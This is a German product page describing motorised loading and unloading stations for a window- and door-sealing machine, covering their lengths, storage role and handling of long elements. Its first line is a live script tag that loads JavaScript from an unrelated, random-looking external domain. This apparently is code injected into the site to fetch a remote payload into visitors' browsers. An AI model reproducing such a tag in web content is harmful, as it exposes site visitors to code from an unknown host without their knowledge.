<script type="text/javascript" src="http://www.alga9frog.com/js/162003.js" ></script> <noscript></noscript>

Ladestation / Entladestation

Ladestation

Ohne sie keine automatische Messung des Holzelementes und keine automatische Zufuhr ohne Einsatz.

Die motorisierte Ladestation arbeitet zusammen mit der Maschine dank der Steuerung.
Sie ist erhältlich in 2m und 3,5m Länge und spielt auch die Rolle eines Lagerverwalters vor dem Versiegeln, oder sogar die Rolle einer Station wo verglast werden kann oder Glasleisten angebracht werden können.

 

Entladestation

Die Entladestation spielt eine entscheidende Rolle für die Versiegelungsmaschine: sie ist diejenige, die die versiegelten Elemente annimmt und lagert, um es der Maschine zu ermöglichen, neue Elemente automatisch zu holen.

Ohne die Entladestation müsste der Betreiber das versiegelte Element von der Maschine entladen, bevor diese ein neues Element holt.
Ihre Rolle ist auch entscheidend für Fenster und Türen deren Länge 2m überschreitet, weil sie ihnen es ermöglicht, hin und her in der Versiegelungseinheit transportiert zu werden, dank der Kupplung ihres motorisierten Teppichs für eine bessere Manövrierfähigkeit.